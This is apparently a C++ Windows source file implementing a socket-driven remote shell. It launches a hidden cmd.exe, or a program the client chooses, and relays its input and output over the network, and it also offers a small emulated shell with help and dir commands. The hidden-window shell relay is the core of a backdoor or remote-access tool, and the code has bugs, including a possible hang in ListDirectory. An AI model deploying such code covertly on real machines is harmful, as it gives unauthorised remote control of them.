#include "CShells.h"

CShells::CShells()
{
	thread = new THREADINFO;
}
CShells::~CShells()
{
	if (thread)
		delete thread;
}

void CShells::StartShell(USERINFO* user) // static
{
	assert(user);
	switch(user->shell_t)
	{
		case SHELL_DEFAULT_PROGRAM:
		case SHELL_CUSTOM_PROGRAM:
			thread->user = user;
			thread->instance = this;
			user->shell.h_thread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ShellThread,
				(void*)thread, 0, &user->shell.thread_id);
			break;
		case SHELL_EMULATED_CMD:
		{
			std::string txt = "shell>";
			send(user->s_id, txt.c_str(), (int)txt.length(), 0);
			break;
		}
		default:
			break;
	}
}

void CShells::ShellThread(void* param)
{
	assert(param);
	THREADINFO* thread = (THREADINFO*)param;
	((CShells*)thread->instance)->ProgramShell(thread->user);
}

int CShells::WriteToShell(USERINFO* user)
{
	assert(user);
	switch (user->shell_t)
	{
		case SHELL_DEFAULT_PROGRAM:
		case SHELL_CUSTOM_PROGRAM:
		{
			if (!WriteFile(user->shell.cmd_write, user->s_recv, (int)strlen(user->s_recv), 
				&user->shell.b_written, 0))
				return WRITE_SHELL_FAILED;

			user->s_recv[strlen(user->s_recv)-1] = 0;
			if (_stricmp(user->s_recv, "exit") == 0)
			{
				HANDLE cmd = 0;
				cmd = OpenProcess(PROCESS_TERMINATE, false, user->shell.process.pi.dwProcessId);
				if (!cmd)
				{
					return WRITE_SHELL_FAILED;
					break;
				}
				TerminateProcess(cmd, 0);
				return WRITE_SHELL_EXIT;
			}
			break;
		}
		case SHELL_EMULATED_CMD:
			return EmulatedShell(user);
			break;
	}
	return WRITE_SHELL_OK;
}

void CShells::ProgramShell(USERINFO* user)
{
	assert(user);
	user->shell.process.secattr.nLength = sizeof(SECURITY_ATTRIBUTES);
	user->shell.process.secattr.bInheritHandle = true;

	/*
		We create 2 (actually 4) pipes. Those pipes we use at the call to execute the program.
		The pipes look like this:
			1. Everything we receive from a socket we 'pipe' (write) to the program.
			2. Everything we receive from the program we 'pipe' (send) to the socket.
	*/
	CreatePipe(&user->shell.socket_read, &user->shell.cmd_write, &user->shell.process.secattr, 0);
	CreatePipe(&user->shell.cmd_read, &user->shell.socket_write, &user->shell.process.secattr, 0);

	GetStartupInfo(&user->shell.process.si);
	user->shell.process.si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
	user->shell.process.si.hStdError = user->shell.socket_write;
	user->shell.process.si.hStdOutput = user->shell.socket_write;
	user->shell.process.si.hStdInput = user->shell.socket_read;
	user->shell.process.si.wShowWindow = SW_HIDE;

	HANDLE hProcess = 0;
	char* program = 0;
	if (user->shell_t == SHELL_DEFAULT_PROGRAM)
		program = "cmd.exe";
	else if (user->shell_t == SHELL_CUSTOM_PROGRAM)
		program = user->shell_program;;

	assert(program);
	if (!CreateProcessA(NULL, program, NULL, NULL, true, CREATE_NEW_CONSOLE, 
						NULL, NULL, &user->shell.process.si, &user->shell.process.pi))
	{
		std::stringstream ss;
		ss << "[-] Failed to create process: " << errno << " - fatal error" << std::endl;
		std::string txt;
		ss >> txt;
		send(user->s_id, txt.c_str(), (int)txt.length(), 0);
		return;
	}

	/*
		First we created the process with piped output/input/errorput :P
		Now we Sleep() 1000ms (1s) to give the CreateProcess function time to load the process.
		Then we clear the ouput buffer, and peek if the process has already something we can send.
		If so, the while loop will read max sizeof(buf) bytes from the pipe,
		and loops till the pipe is empty. Then we get the exitcode of the process, to see if
		its still running. If not, terminate the process. This way we dont read from a closed pipe.
	*/
	Sleep(1000);
	DWORD exitcode = 0;
	while (true)
	{
		Sleep(200);
		memset(user->shell.RecvCmd, 0, sizeof(user->shell.RecvCmd));
		PeekNamedPipe(user->shell.cmd_read, user->shell.RecvCmd, 
			sizeof(user->shell.RecvCmd), &user->shell.b_read, &user->shell.b_avail, NULL);

		while (user->shell.b_read != 0)
		{
			ReadFile(user->shell.cmd_read, user->shell.RecvCmd, 
				sizeof(user->shell.RecvCmd), &user->shell.b_read, NULL);
			send(user->s_id, user->shell.RecvCmd, (int)strlen(user->shell.RecvCmd), 0);
			memset(user->shell.RecvCmd, 0, sizeof(user->shell.RecvCmd));
			Sleep(200);			// give cmd.exe time to process and send the message
			PeekNamedPipe(user->shell.cmd_read, user->shell.RecvCmd,
				sizeof(user->shell.RecvCmd), &user->shell.b_read, &user->shell.b_avail, NULL);
		}

		exitcode = 0;
		if (!GetExitCodeProcess(user->shell.process.pi.hProcess, &exitcode))
		{
			std::stringstream ss;
			ss << "[-] Failed to get process status: " << errno << " - fatal error" << std::endl;
			std::string txt;
			ss >> txt;
			send(user->s_id, txt.c_str(), (int)txt.length(), 0);
			TerminateProcess(user->shell.process.pi.hProcess, GetLastError());
			return;
		}
		if (exitcode != STILL_ACTIVE)
			break;
	}
}

void CShells::CloseShell(USERINFO* user)
{
	assert(user);
	switch (user->shell_t)
	{
		case SHELL_DEFAULT_PROGRAM:
		case SHELL_CUSTOM_PROGRAM:
		{
			HANDLE cmd = OpenProcess(PROCESS_TERMINATE, FALSE, user->shell.process.pi.dwProcessId);
			TerminateProcess(cmd, 0);
			TerminateThread(user->shell.h_thread, 0);
			break;
		}
		case SHELL_EMULATED_CMD:
		default:
			break;
	}
}

int CShells::EmulatedShell(USERINFO* user)
{
	assert(user);
	/*
		EMUSHELLCMDS is a structure containing info about shell commands. cmds[] is a variable,
		that gets declared and initialized at the same time. The struct is as follows:
			1. Command name
			2. Description
			3. Pointer to a function call

		You can add more if you want, just add it here and create a function for it.
		(The last index always have to be 'empty', like shown below. This makes it possible
		to count how many commando's are availlable through a pointer.
		See the help() command.)
	*/
	EMUSHELLCMDS cmds[] = {
		{"help", "Show the commands you can use", &CShells::Help},
		{"dir", "List files and directories of the current directory", &CShells::ListDirectory},
		//{"command", "description of the command", &CShells::command_function},
		{"", "", 0}
	};
	cmdfuncs = cmds;

	/*
		Strip off the last character (\n).
		Then loop through all the possible commands and see if the given command matches.
		If so, call it. All functions commands return a string buffer.
		Exit is not a function call, but still it shoud be handled if the user wants to exit.
		So also check if we recv'd exit, if so quit.
	*/
	user->s_recv[strlen(user->s_recv)-1] = 0;
	for (int x = 0; x < (sizeof(cmds)/sizeof(EMUSHELLCMDS))-1; x++)
	{
		if (_stricmp(cmds[x].name.c_str(), user->s_recv) == 0)
		{
			std::string buffer;
			buffer.clear();
			buffer = (this->*(cmds[x].func))();
			send(user->s_id, buffer.c_str(), (int)buffer.length(), 0);
			break;
		}
	}
	if (_stricmp(user->s_recv, "exit") == 0)
		return WRITE_SHELL_EXIT;

	std::string txt = "shell>";
	send(user->s_id, txt.c_str(), (int)txt.length(), 0);
	return WRITE_SHELL_OK;
}

/*
	Everything below should only be used/called from EmulatedShell().
	Just to keep the code 'clean' :P
*/
std::string CShells::Help()
{
	assert(cmdfuncs);
	std::stringstream ss;
	ss.clear();
	std::string buffer;
	buffer.clear();

	ss << "- cmds -\t- descr -" << std::endl;
	for (int x = 0; cmdfuncs[x].name != ""; x++)
		ss << cmdfuncs[x].name << "\t\t" << cmdfuncs[x].descr << std::endl;

	buffer += ss.str();
	return (buffer);
}

std::string CShells::ListDirectory()
{
	std::stringstream ss;
	ss.clear();
	std::string buffer;
	buffer.clear();
	HANDLE FileHandle;
	WIN32_FIND_DATA FileData;

	char curdir[MAX_PATH+4+1];				// 260 + \*.* + 0
	GetCurrentDirectory(MAX_PATH, curdir);
	ss << curdir << std::endl;
	strncat(curdir, "\\*.*", 4);			// needs to be appened for the function
	FileHandle = FindFirstFile(curdir, &FileData);

	if (INVALID_HANDLE_VALUE == FileHandle)
		return 0;

    do
    {
		if (FileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
			ss << "\t<DIR>   " << FileData.cFileName << std::endl;
		else
		{
			SYSTEMTIME filesystime;
			FILETIME filetime;
			HANDLE hFile;
			ss << "\t\t" << FileData.cFileName << std::endl;
			hFile = CreateFile(FileData.cFileName, GENERIC_READ, 0, NULL,
				OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

			if (hFile == INVALID_HANDLE_VALUE)
				continue;

			GetFileTime(hFile, NULL, NULL, &filetime);
			FileTimeToSystemTime(&filetime, &filesystime);
			// you could add file date here
			// ss << filesystime.wDay "-" filesystime.wMonth "-" filesystime.wYear;
			CloseHandle(hFile);
		}
	} while(FindNextFile(FileHandle, &FileData));
	FindClose(FileHandle);
	buffer += ss.str();
	return (buffer);
}
